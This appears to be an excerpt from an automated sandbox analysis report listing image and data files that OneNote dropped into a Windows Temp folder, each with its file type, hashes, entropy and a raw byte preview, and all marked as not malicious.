C:\Users\user\AppData\Local\Temp\{9E2F72B9-6DFA-47CB-96CF-27BB4FF79035}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	2.941351060644542
Encrypted:	false
SSDEEP:	384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
MD5:	ACF4A9F470281F475EA45E113E9FB009
SHA1:	B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
SHA-256:	5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
SHA-512:	998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
Malicious:	false
Preview:	....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..\|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

C:\Users\user\AppData\Local\Temp\{9EA599D1-099A-4310-BE6F-4763AFFD8E8A}.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Temp\{9F2CE6A8-A995-45B8-86AD-629D17729C25}.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	GIF image data, version 89a, 1012 x 327
Category:	dropped
Size (bytes):	11765
Entropy (8bit):	7.911655818336033
Encrypted:	false
SSDEEP:	192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
MD5:	B035F23C68CC9673E604FE5472F223D2
SHA1:	56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
SHA-256:	F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
SHA-512:	B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
Malicious:	false
Preview:	GIF89a..G.................................................................................................................................................................\|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..\|..~.................................................................................................................................................!.......,......G........H......\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....

C:\Users\user\AppData\Local\Temp\{9F9E3692-8AE1-44CC-B973-367CEB7E81AC}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Temp\{A7A82D23-D9E4-48B9-A010-2BAB13BF91C2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
Category:	dropped
Size (bytes):	1873
Entropy (8bit):	7.534961703340853
Encrypted:	false
SSDEEP:	48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
MD5:	4FC8500BD304AD127AF4B5E269DFF59B
SHA1:	9A5E3432358A0FCDECE86AEB967319B93A65D14A
SHA-256:	B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
SHA-512:	E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.\|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O.....5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F]..........:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.\|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

C:\Users\user\AppData\Local\Temp\{AD1A4591-36AB-4789-A0A0-A78A9DBFB43F}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40035
Entropy (8bit):	7.360144465307449
Encrypted:	false
SSDEEP:	768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
MD5:	B1DDD365D87605F96D72042CB56572F6
SHA1:	ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
SHA-256:	06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
SHA-512:	9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$..r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<\|..1/.\|.....b..-..y....]U#Ctn.7m.._.\|..2I;\|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

C:\Users\user\AppData\Local\Temp\{B168AD09-BAC3-46C7-933C-78FE0650530E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
Category:	dropped
Size (bytes):	2898
Entropy (8bit):	7.551512280854713
Encrypted:	false
SSDEEP:	48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
MD5:	7C7D9922101488124D2E4666709198AC
SHA1:	00CC44A1B84D4D94A0ACE8834491EB5F65D04619
SHA-256:	20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
SHA-512:	882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................\| F.. ...j...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

C:\Users\user\AppData\Local\Temp\{B2FD9259-C557-4CDA-8B6E-C0D63C3CE835}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
Category:	dropped
Size (bytes):	3361
Entropy (8bit):	7.619405839796034
Encrypted:	false
SSDEEP:	96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
MD5:	A994063FF2ABEB78917C5382B2F5FA8C
SHA1:	BD5C4D816B04A2B6596DFE38DB01228F553FACCC
SHA-256:	D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
SHA-512:	CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z\|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3U.7..\|M.x...\|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

C:\Users\user\AppData\Local\Temp\{B34B29B7-693A-4474-A24B-ADFEC1B1AB3D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	79656
Entropy (8bit):	7.966459570826366
Encrypted:	false
SSDEEP:	1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
MD5:	39FF3ACAE544EAC172B1269F825B9E9F
SHA1:	2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
SHA-256:	70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
SHA-512:	3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\..N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.\|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........\|..4.wJ..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

C:\Users\user\AppData\Local\Temp\{B5A623C0-65A9-4DAC-A92C-870AD6929222}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	86187
Entropy (8bit):	7.951356272886186
Encrypted:	false
SSDEEP:	1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
MD5:	FEE4785DF76E93A9DC2F4501CBAEAE12
SHA1:	8FB4527BDE05EF208FCDB168098A07707C27501F
SHA-256:	F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
SHA-512:	7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....\|.,lZKCEB.t...fw\|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..WH<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

C:\Users\user\AppData\Local\Temp\{B7CE535A-3A74-4D57-8BE7-5EE327B69DF9}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Temp\{B87D9C47-4D11-49DF-90C9-5D41C4820C46}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Temp\{B87F792E-C38A-4795-B149-2FB0994A700F}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Temp\{BD06D19F-ADED-47C5-BB24-9BFD014BDB08}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Temp\{BFBAB15F-C769-4047-94BD-A7848C186BC8}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Temp\{C0632B5F-4B1C-4333-99C2-FDED6CF62D56}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6501394646353632
Encrypted:	false
SSDEEP:	6:Ra9pzjYyfB3h1RRXUnfBkTeOR2R2R2jKjUB2DRujlw//0lweI/mB25Rujd:Ra99jYyf9/UfBLQQsUB2MWf/mB2U
